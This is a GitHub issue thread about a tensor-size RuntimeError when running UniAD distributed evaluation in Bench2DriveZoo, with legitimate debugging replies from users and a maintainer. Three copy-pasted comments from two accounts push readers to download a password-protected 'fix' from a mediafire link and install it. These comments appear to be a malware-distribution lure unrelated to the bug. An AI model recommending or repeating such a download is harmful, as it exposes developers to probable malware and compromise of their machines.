### ISSUE TITLE
bug when running ./adzoo/uniad/uniad_dist_eval.sh

### ISSUE THREAD

**Issue by wenxian-yang** [Thinklab-SJTU/Bench2DriveZoo#33]
./adzoo/uniad/uniad_dist_eval.sh ./adzoo/uniad/configs/stage2_e2e/base_e2e_b2d.py ./ckpts/uniad_base_b2d.pth 1
It occurs:
Traceback (most recent call last):
  File "./adzoo/uniad/test.py", line 147, in <module>
    main()
  File "./adzoo/uniad/test.py", line 121, in main
    model = DistributedDataParallel(model.cuda(),
  File "/data/ad_sharing/base_envs/anaconda3/envs/uniad/lib/python3.8/site-packages/torch/nn/parallel/distributed.py", line 498, in __init__
    self._sync_params_and_buffers(authoritative_rank=0)
  File "/data/ad_sharing/base_envs/anaconda3/envs/uniad/lib/python3.8/site-packages/torch/nn/parallel/distributed.py", line 514, in _sync_params_and_buffers
    self._distributed_broadcast_coalesced(
  File "/data/ad_sharing/base_envs/anaconda3/envs/uniad/lib/python3.8/site-packages/torch/nn/parallel/distributed.py", line 1278, in _distributed_broadcast_coalesced
    dist._broadcast_coalesced(
RuntimeError: The size of tensor a (512) must match the size of tensor b (0) at non-singleton dimension 1
ERROR:torch.distributed.elastic.multiprocessing.api:failed (exitcode: 1) local_rank: 0 (pid: 166979) of binary: /data/ad_sharing/base_envs/anaconda3/envs/uniad/bin/python

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by wenxian-yang** [comment]
for name, paramer in model.named_parameters():
            if 0 in np.array(paramer.shape).tolist():
                print(name,paramer.shape)
When I use the above code to output information about the model ./ckpts/uniad_base_b2d.pth, it outputs:
seg_head.stuff_query.weight torch.Size([0, 512])

**Comment by zhiyuanzzz** [comment]
The shape of tensor you mentioned is normal. Since Bench2Drive provides a vectorized map, we do not predict stuff (such as  drivable area) when predicting the map and set num_stuff_classes to 0 in the config. Please provide your PyTorch version so we can reproduce this bug.

**Comment by curryqka** [comment]
> The shape of tensor you mentioned is normal. Since Bench2Drive provides a vectorized map, we do not predict stuff (such as drivable area) when predicting the map and set num_stuff_classes to 0 in the config. Please provide your PyTorch version so we can reproduce this bug.

I also encounter this problem, my pytorch version is 1.13.1
